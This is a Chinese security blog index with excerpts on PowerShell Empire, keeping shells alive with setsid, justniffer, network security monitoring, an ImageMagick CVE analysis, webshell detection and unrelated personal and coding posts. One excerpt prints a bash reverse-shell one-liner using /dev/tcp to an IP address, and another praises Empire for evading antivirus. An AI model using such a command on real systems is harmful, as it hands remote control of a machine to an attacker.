-
powershell学习资源分享
这段时间看了一个Windows下权限维持的开源工具组件Empire,采用powershell来对目标主机进行操作,由于是powershell,所有基本都是免杀。关于Empire,有兴趣的同学可以研究下,下面是相关学习资料: 作者博客: http://www.powershellempire.com/ GitHub链接:https://github.com/PowerShellEmpire Empire:PowerShell后 ...
阅读全文-
setsid实现后台运行
0x00 经典姿势 下面这个在Linux下反弹shell的经典姿势相信大家一定不会陌生: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 但是,这样是有一个小问题的,就是当你在target主机上运行上面这句shell脚本时,它是一直在等待挂着的,如果退出的话,反弹出来的shell也会跟着断掉,这就不好玩了。 0x01 关 ...
-
我所认识的大学·认识自己
来大学之前,我曾在笔记本扉页上写过“大学,我认为是能学到很多东西的”。 这也是我在大学这平淡日子里,不断勉励自己,不断激发自己,坚持到我最后学生时代的一个理念。因为,平庸,让生活太过乏味。 发现自己有太多不足 有时候我也会时常感觉自己是一个奇葩的存在,甚至都没有正常人该有的生活技能。有些时候, ...
-
justniffer实战应用
在上一篇blog《justniffer使用指南》中讲了justniffer的基本使用,本篇blog将分享一下justniffer在生产环境中的具体使用。下面就实际环境中的使用举一些例子加以说明。 0x01 输出日志格式 首先要讲到的就是justniffer的日志输出日志格式,因为这个功能太实用而且强大了。 使用参数:-l or –log-format=<forma ...
-
justniffer使用指南
前言 本篇文章基本翻译自justniffer官方文档,因为笔者觉得自己能力有限,自己写这份指南将有损justniffer的强(bi)猛(ge)。同时,这也是NSM兵器谱中常用之一,笔者将会在随后一系列文章中分享这些利器的运筹之道,各位稍安勿躁。 0x00 justniffer介绍 justniffer是一款全面的网络协议分析利器,它可以捕获网络传输 ...
-
Linux下华为交换机的简单配置
前言 由于管理学校数据中心机房,平时有一些学院的服务器需要托管等等,就需要给服务器分配IP地址。无奈数据中心刚建起来,核心交换机上的VLAN配置都需要临时划分。 关于网络工程这块本来是由一个学弟负责的,但是考虑到大家的课程,可能没有时间及时到规划网络。所以自己干脆学点这方面的东西,方便然后的维护管理工作 ...
-
NSM防御模型-基本方法
本文接着上一篇博文《深入理解NSM–基本概念》 ,在最后说到以漏洞为中心的网络安全防御终将是失败的。在建立现代NSM网络安全监控模型中,将采用Bejtlich的以威胁为中心的防御思想。 以漏洞为中心 vs 以威胁为中心 这里引用《Applied Network Security monitoring》一书中的经典解释: 考虑在一个曲棍球比赛中,你的大门 ...
-
NSM防御模型-基本概念
信息安全领域 随着当今互联网的不断发展,数据的安全重视程度也在不断升温,可谓“数据驱动安全”。信息安全现在已经被划分为不多不同的焦点领域。在《DoD 8500.2》中对整个计算机网络的防御分为了几个域: 保护:该领域主要聚焦对系统的安全加固,以防止事故发生时的漏洞利用与入侵成功。涉及到的代表性内容包括:漏洞评 ...
-
ImageMagick命令执行漏洞分析(CVE-2016-3714)
0x00 漏洞概述 ImageMagick是一款广泛流行的开源图像处理软件,被无数的网站和web应用使用它来进行图像处理。在5月3号ImageMagick披露出了一个严重的0day漏洞,此漏洞允许攻击者通过上传恶意构造的图像文件,在目标服务器执行任意代码。在https://imagetragick.com/站点可以了解这一漏洞的详细信息。 0x01 影响范围 基 ...
-
基于机器学习的分布式Webshell检测系统-绪论篇
0x01 为什么要写这个工具? 长期以来,在一些中小型企业、高校单位以及技术能力较弱的非互联网类公司难免会遭受webshell的攻击。加之黑产市场巨大的利益诱惑,大多数网站都或多或少都遭受过webshell的入侵,而且随着各种webshell技术的变形和隐蔽,传统的检测方法很难做到准确查杀,所谓道高一尺,魔高一丈。在这场博 ...
-
几种常用排序的Python实现
由于某些原因,我也开始看看算法方面的知识了,也是无奈啊~ 由于对Python比较熟悉,所以还是打算用它来复习下吧。 本文用Python实现了插入排序、冒泡排序、快速排序、直接选择排序、堆排序、归并排序。 1、插入排序 描述 插入排序的基本操作就是将一个数据插入到已经排好序的有序数据中,从而得到一个新的、个数加一的 ...
-
-
-
-
-
-
-
-
-
-